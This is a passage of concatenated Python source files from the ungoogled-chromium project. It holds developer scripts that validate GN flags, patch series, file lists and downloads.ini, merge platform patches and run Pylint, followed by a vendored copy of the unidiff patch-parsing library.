Aborting.') sys.exit(1) get_logger().info('Computing lists...') pruning_set, domain_substitution_set, unused_patterns = compute_lists( args.tree, DomainRegexList(args.domain_regex).search_regex, args.processes) with args.pruning.open('w', encoding=_ENCODING) as file_obj: file_obj.writelines('%s\n' % line for line in pruning_set) with args.domain_substitution.open('w', encoding=_ENCODING) as file_obj: file_obj.writelines('%s\n' % line for line in domain_substitution_set) if unused_patterns.log_unused(args.error_unused) and args.error_unused: get_logger().error('Please update or remove unused patterns and/or prefixes. ' 'The lists have still been updated with the remaining valid entries.') sys.exit(1) if __name__ == "__main__": main() File: devutils/check_gn_flags.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Run sanity checking algorithms over GN flags It checks the following: * GN flags in flags.gn are sorted and not duplicated Exit codes: * 0 if no problems detected * 1 if warnings or errors occur """ import argparse import sys from pathlib import Path sys.path.insert(0, str(Path(__file__).resolve().parent.parent / 'utils')) from _common import ENCODING, get_logger sys.path.pop(0) def check_gn_flags(gn_flags_path): """ Checks if GN flags are sorted and not duplicated. gn_flags_path is a pathlib.Path to the GN flags file to check Returns True if warnings were logged; False otherwise """ keys_seen = set() warnings = False with gn_flags_path.open(encoding=ENCODING) as file_obj: iterator = iter(file_obj.read().splitlines()) try: previous = next(iterator) except StopIteration: return warnings for current in iterator: gn_key = current.split('=')[0] if gn_key in keys_seen: get_logger().warning('In GN flags %s, "%s" appears at least twice', gn_flags_path, gn_key) warnings = True else: keys_seen.add(gn_key) if current < previous: get_logger().warning('In GN flags %s, "%s" should be sorted before "%s"', gn_flags_path, current, previous) warnings = True previous = current return warnings def main(): """CLI entrypoint""" root_dir = Path(__file__).resolve().parent.parent default_flags_gn = root_dir / 'flags.gn' parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('-f', '--flags-gn', type=Path, default=default_flags_gn, help='Path to the GN flags to use. Default: %(default)s') args = parser.parse_args() if check_gn_flags(args.flags_gn): sys.exit(1) sys.exit(0) if __name__ == '__main__': main() File: devutils/check_files_exist.py #!/usr/bin/env python3 # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Checks if files in a list exist. Used for quick validation of lists in CI checks. 
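Example invocation (illustrative paths):

    python3 devutils/check_files_exist.py /path/to/source-tree pruning.list domain_substitution.list

The script prints an error and exits with status 1 for the first listed path that
does not exist under the given root directory.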
""" import argparse import sys from pathlib import Path def main(): """CLI entrypoint""" parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('root_dir', type=Path, help='The directory to check from') parser.add_argument('input_files', type=Path, nargs='+', help='The files lists to check') args = parser.parse_args() for input_name in args.input_files: file_iter = filter( len, map(str.strip, Path(input_name).read_text(encoding='UTF-8').splitlines())) for file_name in file_iter: if not Path(args.root_dir, file_name).exists(): print('ERROR: Path "{}" from file "{}" does not exist.'.format( file_name, input_name), file=sys.stderr) sys.exit(1) if __name__ == "__main__": main() File: devutils/__init__.py File: devutils/check_downloads_ini.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Run sanity checking algorithms over downloads.ini files It checks the following: * downloads.ini has the correct format (i.e. conforms to its schema) Exit codes: * 0 if no problems detected * 1 if warnings or errors occur """ import argparse import sys from pathlib import Path sys.path.insert(0, str(Path(__file__).resolve().parent.parent / 'utils')) from downloads import DownloadInfo, schema sys.path.pop(0) def check_downloads_ini(downloads_ini_iter): """ Combines and checks if the the downloads.ini files provided are valid. downloads_ini_iter must be an iterable of strings to downloads.ini files. Returns True if errors occured, False otherwise. """ try: DownloadInfo(downloads_ini_iter) except schema.SchemaError: return True return False def main(): """CLI entrypoint""" root_dir = Path(__file__).resolve().parent.parent default_downloads_ini = [str(root_dir / 'downloads.ini')] parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('-d', '--downloads-ini', type=Path, nargs='*', default=default_downloads_ini, help='List of downloads.ini files to check. Default: %(default)s') args = parser.parse_args() if check_downloads_ini(args.downloads_ini): sys.exit(1) sys.exit(0) if __name__ == '__main__': main() File: devutils/check_patch_files.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. 
"""Run sanity checking algorithms over ungoogled-chromium's patch files It checks the following: * All patches exist * All patches are referenced by the patch order Exit codes: * 0 if no problems detected * 1 if warnings or errors occur """ import argparse import sys from pathlib import Path from third_party import unidiff sys.path.insert(0, str(Path(__file__).resolve().parent.parent / 'utils')) from _common import ENCODING, get_logger, parse_series # pylint: disable=wrong-import-order sys.path.pop(0) # File suffixes to ignore for checking unused patches _PATCHES_IGNORE_SUFFIXES = {'.md'} def _read_series_file(patches_dir, series_file, join_dir=False): """ Returns a generator over the entries in the series file patches_dir is a pathlib.Path to the directory of patches series_file is a pathlib.Path relative to patches_dir join_dir indicates if the patches_dir should be joined with the series entries """ for entry in parse_series(patches_dir / series_file): if join_dir: yield patches_dir / entry else: yield entry def check_patch_readability(patches_dir, series_path=Path('series')): """ Check if the patches from iterable patch_path_iter are readable. Patches that are not are logged to stdout. Returns True if warnings occured, False otherwise. """ warnings = False for patch_path in _read_series_file(patches_dir, series_path, join_dir=True): if patch_path.exists(): with patch_path.open(encoding=ENCODING) as file_obj: try: unidiff.PatchSet(file_obj.read()) except unidiff.errors.UnidiffParseError: get_logger().exception('Could not parse patch: %s', patch_path) warnings = True continue else: get_logger().warning('Patch not found: %s', patch_path) warnings = True return warnings def check_unused_patches(patches_dir, series_path=Path('series')): """ Checks if there are unused patches in patch_dir from series file series_path. Unused patches are logged to stdout. patches_dir is a pathlib.Path to the directory of patches series_path is a pathlib.Path to the series file relative to the patches_dir Returns True if there are unused patches; False otherwise. """ unused_patches = set() for path in patches_dir.rglob('*'): if path.is_dir(): continue if path.suffix in _PATCHES_IGNORE_SUFFIXES: continue unused_patches.add(str(path.relative_to(patches_dir))) unused_patches -= set(_read_series_file(patches_dir, series_path)) unused_patches.remove(str(series_path)) logger = get_logger() for entry in sorted(unused_patches): logger.warning('Unused patch: %s', entry) return bool(unused_patches) def check_series_duplicates(patches_dir, series_path=Path('series')): """ Checks if there are duplicate entries in the series file series_path is a pathlib.Path to the series file relative to the patches_dir returns True if there are duplicate entries; False otherwise. """ entries_seen = set() for entry in _read_series_file(patches_dir, series_path): if entry in entries_seen: get_logger().warning('Patch appears more than once in series: %s', entry) return True entries_seen.add(entry) return False def main(): """CLI entrypoint""" root_dir = Path(__file__).resolve().parent.parent default_patches_dir = root_dir / 'patches' parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('-p', '--patches', type=Path, default=default_patches_dir, help='Path to the patches directory to use. 
Default: %(default)s') args = parser.parse_args() warnings = False warnings |= check_patch_readability(args.patches) warnings |= check_series_duplicates(args.patches) warnings |= check_unused_patches(args.patches) if warnings: sys.exit(1) sys.exit(0) if __name__ == '__main__': main() File: devutils/update_platform_patches.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Utility to ease the updating of platform patches against ungoogled-chromium's patches """ import argparse import os import shutil import sys from pathlib import Path sys.path.insert(0, str(Path(__file__).resolve().parent.parent / 'utils')) from _common import ENCODING, get_logger from patches import merge_patches sys.path.pop(0) _SERIES = 'series' _SERIES_ORIG = 'series.orig' _SERIES_PREPEND = 'series.prepend' _SERIES_MERGED = 'series.merged' def merge_platform_patches(platform_patches_dir, prepend_patches_dir): ''' Prepends prepend_patches_dir into platform_patches_dir Returns True if successful, False otherwise ''' if not (platform_patches_dir / _SERIES).exists(): get_logger().error('Unable to find platform series file: %s', platform_patches_dir / _SERIES) return False # Make series.orig file shutil.copyfile(str(platform_patches_dir / _SERIES), str(platform_patches_dir / _SERIES_ORIG)) # Make series.prepend shutil.copyfile(str(prepend_patches_dir / _SERIES), str(platform_patches_dir / _SERIES_PREPEND)) # Merge patches merge_patches([prepend_patches_dir], platform_patches_dir, prepend=True) (platform_patches_dir / _SERIES).replace(platform_patches_dir / _SERIES_MERGED) return True def _dir_empty(path): ''' Returns True if the directory exists and is empty; False otherwise ''' try: next(os.scandir(str(path))) except StopIteration: return True except FileNotFoundError: pass return False def _remove_files_with_dirs(root_dir, sorted_file_iter): ''' Deletes a list of sorted files relative to root_dir, removing empty directories along the way ''' past_parent = None for partial_path in sorted_file_iter: complete_path = Path(root_dir, partial_path) try: complete_path.unlink() except FileNotFoundError: get_logger().warning('Could not remove prepended patch: %s', complete_path) if past_parent != complete_path.parent: while past_parent and _dir_empty(past_parent): past_parent.rmdir() past_parent = past_parent.parent past_parent = complete_path.parent # Handle last path's directory while _dir_empty(complete_path.parent): complete_path.parent.rmdir() complete_path = complete_path.parent def unmerge_platform_patches(platform_patches_dir): ''' Undo merge_platform_patches(), adding any new patches from series.merged as necessary Returns True if successful, False otherwise ''' if not (platform_patches_dir / _SERIES_PREPEND).exists(): get_logger().error('Unable to find series.prepend at: %s', platform_patches_dir / _SERIES_PREPEND) return False prepend_series = set( filter(len, (platform_patches_dir / _SERIES_PREPEND).read_text(encoding=ENCODING).splitlines())) # Remove prepended files with directories _remove_files_with_dirs(platform_patches_dir, sorted(prepend_series)) # Determine positions of blank spaces in series.orig if not (platform_patches_dir / _SERIES_ORIG).exists(): get_logger().error('Unable to find series.orig at: %s', platform_patches_dir / _SERIES_ORIG) return False orig_series = (platform_patches_dir / 
_SERIES_ORIG).read_text(encoding=ENCODING).splitlines() # patch path -> list of lines after patch path and before next patch path path_comments = dict() # patch path -> inline comment for patch path_inline_comments = dict() previous_path = None for partial_path in orig_series: if not partial_path or partial_path.startswith('#'): if partial_path not in path_comments: path_comments[previous_path] = list() path_comments[previous_path].append(partial_path) else: path_parts = partial_path.split(' #', maxsplit=1) previous_path = path_parts[0] if len(path_parts) == 2: path_inline_comments[path_parts[0]] = path_parts[1] # Apply changes on series.merged into a modified version of series.orig if not (platform_patches_dir / _SERIES_MERGED).exists(): get_logger().error('Unable to find series.merged at: %s', platform_patches_dir / _SERIES_MERGED) return False new_series = filter(len, (platform_patches_dir / _SERIES_MERGED).read_text(encoding=ENCODING).splitlines()) new_series = filter((lambda x: x not in prepend_series), new_series) new_series = list(new_series) series_index = 0 while series_index < len(new_series): current_path = new_series[series_index] if current_path in path_inline_comments: new_series[series_index] = current_path + ' #' + path_inline_comments[current_path] if current_path in path_comments: new_series.insert(series_index + 1, '\n'.join(path_comments[current_path])) series_index += 1 series_index += 1 # Write series file with (platform_patches_dir / _SERIES).open('w', encoding=ENCODING) as series_file: series_file.write('\n'.join(new_series)) series_file.write('\n') # All other operations are successful; remove merging intermediates (platform_patches_dir / _SERIES_MERGED).unlink() (platform_patches_dir / _SERIES_ORIG).unlink() (platform_patches_dir / _SERIES_PREPEND).unlink() return True def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('command', choices=('merge', 'unmerge'), help='Merge or unmerge ungoogled-chromium patches with platform patches') parser.add_argument('platform_patches', type=Path, help='The path to the platform patches in GNU Quilt format to merge into') args = parser.parse_args() repo_dir = Path(__file__).resolve().parent.parent success = False if args.command == 'merge': success = merge_platform_patches(args.platform_patches, repo_dir / 'patches') elif args.command == 'unmerge': success = unmerge_platform_patches(args.platform_patches) else: raise NotImplementedError(args.command) if success: return 0 return 1 if __name__ == '__main__': sys.exit(main()) File: devutils/run_devutils_pylint.py #!/usr/bin/env python3 # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. 
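# Illustrative invocation (the --hide-fixme flag is optional; see main() below):
#
#   python3 devutils/run_devutils_pylint.py --hide-fixme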
"""Run Pylint over devutils""" import argparse import sys from pathlib import Path from run_other_pylint import ChangeDir, run_pylint def main(): """CLI entrypoint""" parser = argparse.ArgumentParser(description='Run Pylint over devutils') parser.add_argument('--hide-fixme', action='store_true', help='Hide "fixme" Pylint warnings.') parser.add_argument('--show-locally-disabled', action='store_true', help='Show "locally-disabled" Pylint warnings.') args = parser.parse_args() disables = [ 'wrong-import-position', 'bad-continuation', 'duplicate-code', ] if args.hide_fixme: disables.append('fixme') if not args.show_locally_disabled: disables.append('locally-disabled') pylint_options = [ '--disable={}'.format(','.join(disables)), '--jobs=4', '--score=n', '--persistent=n', ] ignore_prefixes = [ ('third_party', ), ] sys.path.insert(1, str(Path(__file__).resolve().parent.parent / 'utils')) sys.path.insert(2, str(Path(__file__).resolve().parent.parent / 'devutils' / 'third_party')) with ChangeDir(Path(__file__).parent): result = run_pylint( Path(), pylint_options, ignore_prefixes=ignore_prefixes, ) sys.path.pop(2) sys.path.pop(1) if not result: sys.exit(1) sys.exit(0) if __name__ == '__main__': main() File: devutils/validate_config.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Run sanity checking algorithms over ungoogled-chromium's config files NOTE: This script is hardcoded to run over ungoogled-chromium's config files only. To check other files, use the other scripts imported by this script. It checks the following: * All patches exist * All patches are referenced by the patch order * Each patch is used only once * GN flags in flags.gn are sorted and not duplicated * downloads.ini has the correct format (i.e. conforms to its schema) Exit codes: * 0 if no problems detected * 1 if warnings or errors occur """ import sys from pathlib import Path from check_downloads_ini import check_downloads_ini from check_gn_flags import check_gn_flags from check_patch_files import (check_patch_readability, check_series_duplicates, check_unused_patches) def main(): """CLI entrypoint""" warnings = False root_dir = Path(__file__).resolve().parent.parent patches_dir = root_dir / 'patches' # Check patches warnings |= check_patch_readability(patches_dir) warnings |= check_series_duplicates(patches_dir) warnings |= check_unused_patches(patches_dir) # Check GN flags warnings |= check_gn_flags(root_dir / 'flags.gn') # Check downloads.ini warnings |= check_downloads_ini([root_dir / 'downloads.ini']) if warnings: sys.exit(1) sys.exit(0) if __name__ == '__main__': if sys.argv[1:]: print(__doc__) else: main() File: devutils/run_utils_pylint.py #!/usr/bin/env python3 # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. 
"""Run Pylint over utils""" import argparse import sys from pathlib import Path from run_other_pylint import ChangeDir, run_pylint def main(): """CLI entrypoint""" parser = argparse.ArgumentParser(description='Run Pylint over utils') parser.add_argument('--hide-fixme', action='store_true', help='Hide "fixme" Pylint warnings.') parser.add_argument('--show-locally-disabled', action='store_true', help='Show "locally-disabled" Pylint warnings.') args = parser.parse_args() disable = ['bad-continuation'] if args.hide_fixme: disable.append('fixme') if not args.show_locally_disabled: disable.append('locally-disabled') pylint_options = [ '--disable={}'.format(','.join(disable)), '--jobs=4', '--max-args=6', '--score=n', '--persistent=n', ] ignore_prefixes = [ ('third_party', ), ('tests', ), ] sys.path.insert(1, str(Path(__file__).resolve().parent.parent / 'utils' / 'third_party')) sys.path.append(Path(__file__).resolve().parent.parent / 'utils') with ChangeDir(Path(__file__).resolve().parent.parent / 'utils'): result = run_pylint( Path(), pylint_options, ignore_prefixes=ignore_prefixes, ) sys.path.pop(1) if not result: sys.exit(1) sys.exit(0) if __name__ == '__main__': main() File: devutils/third_party/__init__.py File: devutils/third_party/unidiff/patch.py # -*- coding: utf-8 -*- # The MIT License (MIT) # Copyright (c) 2014-2017 Matias Bordese # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. 
"""Classes used by the unified diff parser to keep the diff data.""" from __future__ import unicode_literals import codecs import sys from .constants import ( DEFAULT_ENCODING, LINE_TYPE_ADDED, LINE_TYPE_CONTEXT, LINE_TYPE_EMPTY, LINE_TYPE_REMOVED, LINE_TYPE_NO_NEWLINE, LINE_VALUE_NO_NEWLINE, RE_HUNK_BODY_LINE, RE_HUNK_EMPTY_BODY_LINE, RE_HUNK_HEADER, RE_SOURCE_FILENAME, RE_TARGET_FILENAME, RE_NO_NEWLINE_MARKER, ) from .errors import UnidiffParseError PY2 = sys.version_info[0] == 2 if PY2: from StringIO import StringIO open_file = codecs.open make_str = lambda x: x.encode(DEFAULT_ENCODING) def implements_to_string(cls): cls.__unicode__ = cls.__str__ cls.__str__ = lambda x: x.__unicode__().encode(DEFAULT_ENCODING) return cls else: from io import StringIO open_file = open make_str = str implements_to_string = lambda x: x unicode = str basestring = str @implements_to_string class Line(object): """A diff line.""" def __init__(self, value, line_type, source_line_no=None, target_line_no=None, diff_line_no=None): super(Line, self).__init__() self.source_line_no = source_line_no self.target_line_no = target_line_no self.diff_line_no = diff_line_no self.line_type = line_type self.value = value def __repr__(self): return make_str("<Line: %s%s>") % (self.line_type, self.value) def __str__(self): return "%s%s" % (self.line_type, self.value) def __eq__(self, other): return (self.source_line_no == other.source_line_no and self.target_line_no == other.target_line_no and self.diff_line_no == other.diff_line_no and self.line_type == other.line_type and self.value == other.value) @property def is_added(self): return self.line_type == LINE_TYPE_ADDED @property def is_removed(self): return self.line_type == LINE_TYPE_REMOVED @property def is_context(self): return self.line_type == LINE_TYPE_CONTEXT @implements_to_string class PatchInfo(list): """Lines with extended patch info. Format of this info is not documented and it very much depends on patch producer. 
""" def __repr__(self): value = "<PatchInfo: %s>" % self[0].strip() return make_str(value) def __str__(self): return ''.join(unicode(line) for line in self) @implements_to_string class Hunk(list): """Each of the modified blocks of a file.""" def __init__(self, src_start=0, src_len=0, tgt_start=0, tgt_len=0, section_header=''): if src_len is None: src_len = 1 if tgt_len is None: tgt_len = 1 self.added = 0 # number of added lines self.removed = 0 # number of removed lines self.source = [] self.source_start = int(src_start) self.source_length = int(src_len) self.target = [] self.target_start = int(tgt_start) self.target_length = int(tgt_len) self.section_header = section_header def __repr__(self): value = "<Hunk: @@ %d,%d %d,%d @@ %s>" % (self.source_start, self.source_length, self.target_start, self.target_length, self.section_header) return make_str(value) def __str__(self): # section header is optional and thus we output it only if it's present head = "@@ -%d,%d +%d,%d @@%s\n" % ( self.source_start, self.source_length, self.target_start, self.target_length, ' ' + self.section_header if self.section_header else '') content = ''.join(unicode(line) for line in self) return head + content def append(self, line): """Append the line to hunk, and keep track of source/target lines.""" super(Hunk, self).append(line) s = str(line) if line.is_added: self.added += 1 self.target.append(s) elif line.is_removed: self.removed += 1 self.source.append(s) elif line.is_context: self.target.append(s) self.source.append(s) def is_valid(self): """Check hunk header data matches entered lines info.""" return (len(self.source) == self.source_length and len(self.target) == self.target_length) def source_lines(self): """Hunk lines from source file (generator).""" return (l for l in self if l.is_context or l.is_removed) def target_lines(self): """Hunk lines from target file (generator).""" return (l for l in self if l.is_context or l.is_added) class PatchedFile(list): """Patch updated file, it is a list of Hunks.""" def __init__(self, patch_info=None, source='', target='', source_timestamp=None, target_timestamp=None): super(PatchedFile, self).__init__() self.patch_info = patch_info self.source_file = source self.source_timestamp = source_timestamp self.target_file = target self.target_timestamp = target_timestamp def __repr__(self): return make_str("<PatchedFile: %s>") % make_str(self.path) def __str__(self): # patch info is optional info = '' if self.patch_info is None else str(self.patch_info) source = "--- %s%s\n" % ( self.source_file, '\t' + self.source_timestamp if self.source_timestamp else '') target = "+++ %s%s\n" % ( self.target_file, '\t' + self.target_timestamp if self.target_timestamp else '') hunks = ''.join(unicode(hunk) for hunk in self) return info + source + target + hunks def _parse_hunk(self, header, diff, encoding): """Parse hunk details.""" header_info = RE_HUNK_HEADER.match(header) hunk_info = header_info.groups() hunk = Hunk(*hunk_info) source_line_no = hunk.source_start target_line_no = hunk.target_start expected_source_end = source_line_no + hunk.source_length expected_target_end = target_line_no + hunk.target_length for diff_line_no, line in diff: if encoding is not None: line = line.decode(encoding) valid_line = RE_HUNK_EMPTY_BODY_LINE.match(line) if not valid_line: valid_line = RE_HUNK_BODY_LINE.match(line) if not valid_line: raise UnidiffParseError('Hunk diff line expected: %s' % line) line_type = valid_line.group('line_type') if line_type == LINE_TYPE_EMPTY: line_type = LINE_TYPE_CONTEXT 
value = valid_line.group('value') original_line = Line(value, line_type=line_type) if line_type == LINE_TYPE_ADDED: original_line.target_line_no = target_line_no target_line_no += 1 elif line_type == LINE_TYPE_REMOVED: original_line.source_line_no = source_line_no source_line_no += 1 elif line_type == LINE_TYPE_CONTEXT: original_line.target_line_no = target_line_no target_line_no += 1 original_line.source_line_no = source_line_no source_line_no += 1 elif line_type == LINE_TYPE_NO_NEWLINE: pass else: original_line = None # stop parsing if we got past expected number of lines if (source_line_no > expected_source_end or target_line_no > expected_target_end): raise UnidiffParseError('Hunk is longer than expected') if original_line: original_line.diff_line_no = diff_line_no hunk.append(original_line) # if hunk source/target lengths are ok, hunk is complete if (source_line_no == expected_source_end and target_line_no == expected_target_end): break # report an error if we haven't got expected number of lines if (source_line_no < expected_source_end or target_line_no < expected_target_end): raise UnidiffParseError('Hunk is shorter than expected') self.append(hunk) def _add_no_newline_marker_to_last_hunk(self): if not self: raise UnidiffParseError( 'Unexpected marker:' + LINE_VALUE_NO_NEWLINE) last_hunk = self[-1] last_hunk.append( Line(LINE_VALUE_NO_NEWLINE + '\n', line_type=LINE_TYPE_NO_NEWLINE)) def _append_trailing_empty_line(self): if not self: raise UnidiffParseError('Unexpected trailing newline character') last_hunk = self[-1] last_hunk.append(Line('\n', line_type=LINE_TYPE_EMPTY)) @property def path(self): """Return the file path abstracted from VCS.""" if (self.source_file.startswith('a/') and self.target_file.startswith('b/')): filepath = self.source_file[2:] elif (self.source_file.startswith('a/') and self.target_file == '/dev/null'): filepath = self.source_file[2:] elif (self.target_file.startswith('b/') and self.source_file == '/dev/null'): filepath = self.target_file[2:] else: filepath = self.source_file return filepath @property def added(self): """Return the file total added lines.""" return sum([hunk.added for hunk in self]) @property def removed(self): """Return the file total removed lines.""" return sum([hunk.removed for hunk in self]) @property def is_added_file(self): """Return True if this patch adds the file.""" return (len(self) == 1 and self[0].source_start == 0 and self[0].source_length == 0) @property def is_removed_file(self): """Return True if this patch removes the file.""" return (len(self) == 1 and self[0].target_start == 0 and self[0].target_length == 0) @property def is_modified_file(self): """Return True if this patch modifies the file.""" return not (self.is_added_file or self.is_removed_file) @implements_to_string class PatchSet(list): """A list of PatchedFiles.""" def __init__(self, f, encoding=None): super(PatchSet, self).__init__() # convert string inputs to StringIO objects if isinstance(f, basestring): f = self._convert_string(f, encoding) # make sure we pass an iterator object to parse data = iter(f) # if encoding is None, assume we are reading unicode data self._parse(data, encoding=encoding) def __repr__(self): return make_str('<PatchSet: %s>') % super(PatchSet, self).__repr__() def __str__(self): return ''.join(unicode(patched_file) for patched_file in self) def _parse(self, diff, encoding): current_file = None patch_info = None diff = enumerate(diff, 1) for unused_diff_line_no, line in diff: if encoding is not None: line = line.decode(encoding) # 
check for source file header is_source_filename = RE_SOURCE_FILENAME.match(line) if is_source_filename: source_file = is_source_filename.group('filename') source_timestamp = is_source_filename.group('timestamp') # reset current file current_file = None continue # check for target file header is_target_filename = RE_TARGET_FILENAME.match(line) if is_target_filename: if current_file is not None: raise UnidiffParseError('Target without source: %s' % line) target_file = is_target_filename.group('filename') target_timestamp = is_target_filename.group('timestamp') # add current file to PatchSet current_file = PatchedFile( patch_info, source_file, target_file, source_timestamp, target_timestamp) self.append(current_file) patch_info = None continue # check for hunk header is_hunk_header = RE_HUNK_HEADER.match(line) if is_hunk_header: if current_file is None: raise UnidiffParseError('Unexpected hunk found: %s' % line) current_file._parse_hunk(line, diff, encoding) continue # check for no newline marker is_no_newline = RE_NO_NEWLINE_MARKER.match(line) if is_no_newline: if current_file is None: raise UnidiffParseError('Unexpected marker: %s' % line) current_file._add_no_newline_marker_to_last_hunk() continue # sometimes hunks can be followed by empty lines if line == '\n' and current_file is not None: current_file._append_trailing_empty_line() continue # if nothing has matched above then this line is a patch info if patch_info is None: current_file = None patch_info = PatchInfo() patch_info.append(line) @classmethod def from_filename(cls, filename, encoding=DEFAULT_ENCODING, errors=None): """Return a PatchSet instance given a diff filename.""" with open_file(filename, 'r', encoding=encoding, errors=errors) as f: instance = cls(f) return instance @staticmethod def _convert_string(data, encoding=None, errors='strict'): if encoding is not None: # if encoding is given, assume bytes and decode data = unicode(data, encoding=encoding, errors=errors) return StringIO(data) @classmethod def from_string(cls, data, encoding=None, errors='strict'): """Return a PatchSet instance given a diff string.""" return cls(cls._convert_string(data, encoding, errors)) @property def added_files(self): """Return patch added files as a list.""" return [f for f in self if f.is_added_file] @property def removed_files(self): """Return patch removed files as a list.""" return [f for f in self if f.is_removed_file] @property def modified_files(self): """Return patch modified files as a list.""" return [f for f in self if f.is_modified_file] @property def added(self): """Return the patch total added lines.""" return sum([f.added for f in self]) @property def removed(self): """Return the patch total removed lines.""" return sum([f.removed for f in self]) File: devutils/third_party/unidiff/constants.py # -*- coding: utf-8 -*- # The MIT License (MIT) # Copyright (c) 2014-2017 Matias Bordese # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. 
# # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. """Useful constants and regexes used by the package.""" from __future__ import unicode_literals import re RE_SOURCE_FILENAME = re.compile( r'^--- (?P<filename>[^\t\n]+)(?:\t(?P<timestamp>[^\n]+))?') RE_TARGET_FILENAME = re.compile( r'^\+\+\+ (?P<filename>[^\t\n]+)(?:\t(?P<timestamp>[^\n]+))?') # @@ (source offset, length) (target offset, length) @@ (section header) RE_HUNK_HEADER = re.compile( r"^@@ -(\d+)(?:,(\d+))? \+(\d+)(?:,(\d+))?\ @@[ ]?(.*)") # kept line (context) # \n empty line (treat like context) # + added line # - deleted line # \ No newline case RE_HUNK_BODY_LINE = re.compile( r'^(?P<line_type>[- \+\\])(?P<value>.*)', re.DOTALL) RE_HUNK_EMPTY_BODY_LINE = re.compile( r'^(?P<line_type>[- \+\\]?)(?P<value>[\r\n]{1,2})', re.DOTALL) RE_NO_NEWLINE_MARKER = re.compile(r'^\\ No newline at end of file') DEFAULT_ENCODING = 'UTF-8' LINE_TYPE_ADDED = '+' LINE_TYPE_REMOVED = '-' LINE_TYPE_CONTEXT = ' ' LINE_TYPE_EMPTY = '' LINE_TYPE_NO_NEWLINE = '\\' LINE_VALUE_NO_NEWLINE = ' No newline at end of file' File: devutils/third_party/unidiff/__init__.py # -*- coding: utf-8 -*- # The MIT License (MIT) # Copyright (c) 2014-2017 Matias Bordese # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. """Unidiff parsing library.""" from __future__ import unicode_literals from . 
